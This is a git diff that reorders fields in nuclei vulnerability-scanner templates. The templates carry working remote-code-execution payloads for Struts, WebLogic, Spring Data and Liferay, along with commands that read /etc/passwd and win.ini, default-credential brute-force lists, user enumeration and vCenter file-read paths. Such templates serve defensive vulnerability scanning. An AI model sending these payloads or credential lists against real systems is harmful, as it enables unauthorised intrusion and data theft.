diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index 9cbbb7d652..7351d61bd6 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -9,12 +9,8 @@ info: tags: cve,cve2013,rce,struts,apache requests: - - payloads: - params: - - "redirect" - - "action" - - "redirectAction" - raw: + + - raw: - | GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} @@ -36,6 +32,12 @@ requests: Accept: */* Accept-Language: en + payloads: + params: + - "redirect" + - "action" + - "redirectAction" + matchers-condition: and matchers: - type: status diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 5d46e8977b..808fea6490 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -12,7 +12,16 @@ info: tags: cve,cve2017,rce,embedthis,goahead,fuzz requests: - - payloads: + + - raw: + - | + GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) + Accept: */* + Connection: close + + payloads: endpoint: - admin - apply @@ -79,15 +88,9 @@ requests: - webviewLogin_m64 - webviewer - welcome - raw: - - | - GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) - Accept: */* - Connection: close attack: sniper + matchers-condition: and matchers: - type: status diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index 6094adff33..8c813bb519 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -15,11 +15,8 @@ info: tags: cve,cve2018,vmware,rce requests: - - payloads: - command: - - "cat /etc/passwd" - - "type C:\\/Windows\\/win.ini" - raw: + + - raw: - | POST /account HTTP/1.1 Host: {{Hostname}} @@ -27,6 +24,12 @@ requests: Content-Type: application/x-www-form-urlencoded name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei + + payloads: + command: + - "cat /etc/passwd" + - "type C:\\/Windows\\/win.ini" + matchers: - type: regex regex: diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index c4e52beccf..0a7448f4a0 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -10,19 +10,18 @@ info: requests: - - payloads: - ids: helpers/wordlists/numbers.txt - - attack: sniper - threads: 50 - - raw: + - raw: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 Accept-Language: en-US,en;q=0.9 + payloads: + ids: helpers/wordlists/numbers.txt + attack: sniper + threads: 50 + matchers-condition: and matchers: - type: status diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 4c2e370aa0..6a4b9c9d0f 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -20,11 +20,8 @@ info: tags: cve,cve2020,oracle,rce,weblogic requests: - - payloads: - exec: - - "type C:\\Windows\\win.ini" # Windows - - "cat /etc/passwd" # *nix - raw: + + - raw: - | POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 Host: {{Hostname}} @@ -33,6 +30,12 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=utf-8 _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 + + payloads: + exec: + - "type C:\\Windows\\win.ini" # Windows + - "cat /etc/passwd" # *nix + matchers-condition: and matchers: - type: regex diff --git a/cves/2020/CVE-2020-23972.yaml b/cves/2020/CVE-2020-23972.yaml index 4f5e8e46bf..3d15c318ef 100644 --- a/cves/2020/CVE-2020-23972.yaml +++ b/cves/2020/CVE-2020-23972.yaml @@ -13,11 +13,8 @@ info: tags: cve,cve2020,joomla requests: - - payloads: - component: - - "com_gmapfp" - - "comgmapfp" - raw: + + - raw: - | POST /index.php?option=§component§&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1 Host: {{Hostname}} @@ -41,6 +38,12 @@ requests: no_html ------WebKitFormBoundarySHHbUsfCoxlX1bpS-- + + payloads: + component: + - "com_gmapfp" + - "comgmapfp" + extractors: - type: regex part: body diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index e552deef58..4bf22c5771 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -11,13 +11,8 @@ info: - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 requests: - - payloads: - command: - - "systeminfo" # Windows - - "lsb_release -a" # Linux - attack: sniper - raw: + - raw: - | POST /api/jsonws/invoke HTTP/1.1 Host: {{Hostname}} @@ -33,6 +28,12 @@ requests: cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D + payloads: + command: + - "systeminfo" # Windows + - "lsb_release -a" # Linux + attack: sniper + matchers-condition: and matchers: - type: regex diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 30b1006bc0..1214279169 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -7,7 +7,23 @@ info: tags: aem,default-login,fuzz requests: - - payloads: + - raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/plain, */*; q=0.01 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Content-Length: 67 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + Connection: close + + _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true + + payloads: rr_username: - admin @@ -35,22 +51,6 @@ requests: attack: pitchfork # Available options: sniper, pitchfork and clusterbomb - raw: - - | - POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/plain, */*; q=0.01 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Content-Length: 67 - Origin: {{BaseURL}} - Referer: {{BaseURL}}/libs/granite/core/content/login.html - Connection: close - - _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true - matchers-condition: and matchers: - type: status diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml index 12d11eae20..33dfdc240c 100644 --- a/default-logins/apache/tomcat-manager-default.yaml +++ b/default-logins/apache/tomcat-manager-default.yaml @@ -7,7 +7,13 @@ info: requests: - - payloads: + - raw: + - | + GET /manager/html HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: username: - tomcat - admin @@ -46,16 +52,6 @@ requests: attack: pitchfork # Available options: sniper, pitchfork and clusterbomb - raw: - # Request with simple param and header manipulation with DSL functions - - | - GET /manager/html HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 - Accept-Language: en-US,en;q=0.9 - Connection: close - matchers-condition: and matchers: - type: status diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 49b317b44e..8c9f3a9649 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -10,19 +10,7 @@ info: requests: - - payloads: - - gitlab_password: - - 12345 - - 123456789 - gitlab_user: - - 1234 - - admin - # Enumerate valid user. - - attack: clusterbomb - - raw: + - raw: - | POST /oauth/token HTTP/1.1 Host: {{Hostname}} @@ -35,6 +23,17 @@ requests: {"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"} + payloads: + + gitlab_password: + - 12345 + - 123456789 + gitlab_user: + - 1234 + - admin + + attack: clusterbomb + matchers-condition: and matchers: - type: status diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml index 202a386634..844a2403f9 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-credential.yaml @@ -12,23 +12,7 @@ info: requests: - - payloads: - - # grafana_username: - # - admin - - grafana_password: - - prom-operator - - admin - - # Added default grafana and prometheus user. - # Source:- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - - attack: sniper - - # Available types: sniper, pitchfork and clusterbomb - - raw: + - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} @@ -41,7 +25,13 @@ requests: {"user":"admin","password":"§grafana_password§"} - # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin + + payloads: + grafana_password: + - prom-operator + - admin + + attack: sniper matchers-condition: and matchers: diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml index df0060a22f..71b81d2b60 100644 --- a/fuzzing/adminer-panel-fuzz.yaml +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -13,20 +13,19 @@ info: requests: - - payloads: - path: helpers/wordlists/adminer-paths.txt - - attack: sniper - threads: 50 - - raw: + - raw: - | GET {{path}} HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} + payloads: + path: helpers/wordlists/adminer-paths.txt + + attack: sniper + threads: 50 + matchers-condition: and matchers: diff --git a/fuzzing/header-command-injection.yaml b/fuzzing/header-command-injection.yaml index de1e04b0e9..c0aa1042cf 100644 --- a/fuzzing/header-command-injection.yaml +++ b/fuzzing/header-command-injection.yaml @@ -8,20 +8,19 @@ info: tags: fuzz,rce requests: - - payloads: - header: helpers/payloads/request-headers.txt - payload: helpers/payloads/command-injection.txt - raw: + - raw: - | GET /?§header§ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 §header§: §payload§ - Connection: close + payloads: + header: helpers/payloads/request-headers.txt + payload: helpers/payloads/command-injection.txt attack: clusterbomb redirects: true + matchers-condition: or matchers: - type: word diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml index d5406502f5..2e23ac3527 100644 --- a/fuzzing/mdb-database-file.yaml +++ b/fuzzing/mdb-database-file.yaml @@ -8,13 +8,8 @@ info: reference: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.html requests: - - payloads: - mdbPaths: helpers/wordlists/mdb-paths.txt - attack: sniper - threads: 50 - - raw: + - raw: - | GET {{mdbPaths}} HTTP/1.1 Host: {{Hostname}} @@ -22,7 +17,13 @@ requests: Accept-Language: en-US,en;q=0.9 Connection: close + payloads: + mdbPaths: helpers/wordlists/mdb-paths.txt + + attack: sniper + threads: 50 max-size: 500 # Size in bytes - Max Size to read from server response + matchers-condition: and matchers: - type: binary diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml index 434b666a00..bc34994801 100644 --- a/fuzzing/prestashop-module-fuzz.yaml +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -7,13 +7,7 @@ info: requests: - - payloads: - path: helpers/wordlists/prestashop-modules.txt - - attack: sniper - threads: 50 - - raw: + - raw: - | GET /modules/{{path}}/config.xml HTTP/1.1 Host: {{Hostname}} @@ -21,6 +15,11 @@ requests: Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} + payloads: + path: helpers/wordlists/prestashop-modules.txt + attack: sniper + threads: 50 + matchers-condition: and matchers: - type: word diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml index 6653e7fd0c..8ac220d66a 100644 --- a/fuzzing/wordpress-plugins-detect.yaml +++ b/fuzzing/wordpress-plugins-detect.yaml @@ -6,19 +6,19 @@ info: tags: fuzz requests: - - payloads: - pluginSlug: helpers/wordlists/wordpress-plugins.txt - attack: sniper - threads: 50 - - raw: + - raw: - | GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} + payloads: + pluginSlug: helpers/wordlists/wordpress-plugins.txt + attack: sniper + threads: 50 redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: status diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml index 48f331a039..5679a9f65a 100644 --- a/fuzzing/wordpress-themes-detect.yaml +++ b/fuzzing/wordpress-themes-detect.yaml @@ -6,19 +6,19 @@ info: tags: fuzz requests: - - payloads: - themeSlug: helpers/wordlists/wordpress-themes.txt - attack: sniper - threads: 50 - - raw: + - raw: - | GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} + payloads: + themeSlug: helpers/wordlists/wordpress-themes.txt + attack: sniper + threads: 50 redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: status diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml index cfd9fc28aa..8e16183217 100644 --- a/miscellaneous/ntlm-directories.yaml +++ b/miscellaneous/ntlm-directories.yaml @@ -8,7 +8,14 @@ info: reference: https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 requests: - - payloads: + + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + + payloads: path: - / - /abs/ @@ -60,12 +67,6 @@ requests: attack: sniper threads: 50 - raw: - - | - GET {{path}} HTTP/1.1 - Host: {{Hostname}} - Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= - matchers-condition: and matchers: - type: dsl diff --git a/network/ftp-default-creds.yaml b/network/ftp-default-creds.yaml index 18bef48e05..7b1e8b82c9 100644 --- a/network/ftp-default-creds.yaml +++ b/network/ftp-default-creds.yaml @@ -7,7 +7,14 @@ info: tags: network,ftp,default-login network: - - payloads: + + - inputs: + - data: "USER {{username}}\r\nPASS {{password}}\r\n" + host: + - "{{Hostname}}:21" + - "{{Hostname}}" + + payloads: username: - admin - root @@ -23,10 +30,7 @@ network: - stingray attack: clusterbomb - inputs: - - data: "USER {{username}}\r\nPASS {{password}}\r\n" - host: - - "{{Hostname}}:21" + matchers: - type: word words: diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml index f961cad2cb..70867414e7 100644 --- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml +++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml @@ -5,23 +5,21 @@ info: name: GitLab - User Enumeration severity: info tags: gitlab,enumeration - - # Username source - https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt + reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt requests: - - payloads: - user: helpers/wordlists/user-list.txt - attack: sniper - threads: 50 - raw: + - raw: - | GET /users/{{user}}/exists HTTP/1.1 Host: {{Hostname}} - Accept-Language: en-US,en;q=0.9 Accept: application/json, text/plain, */* Referer: {{BaseURL}} - Connection: keep-alive + + payloads: + user: helpers/wordlists/user-list.txt + attack: sniper + threads: 50 matchers-condition: and matchers: diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-user-open-api.yaml index 5937c26ea4..e9a99ab5a4 100644 --- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml +++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml @@ -8,19 +8,19 @@ info: reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 requests: - - payloads: - uid: helpers/wordlists/numbers.txt - attack: sniper - threads: 50 - raw: + + - raw: - | GET /api/v4/users/{{uid}} HTTP/1.1 Host: {{Hostname}} - Accept-Language: en-US,en;q=0.9 Accept: application/json, text/plain, */* Referer: {{BaseURL}} - Connection: keep-alive + + payloads: + uid: helpers/wordlists/numbers.txt + attack: sniper + threads: 50 matchers-condition: and matchers: diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index c990d11794..6f9c1901c4 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml @@ -10,20 +10,19 @@ info: tags: vmware,lfi requests: - - payloads: + + - raw: + - | + GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1 + Host: {{Hostname}} + + payloads: path: - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008) - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0 attack: sniper - raw: - - | - GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - Accept: */* - Accept-Language: en - Connection: close + matchers-condition: and matchers: - type: regex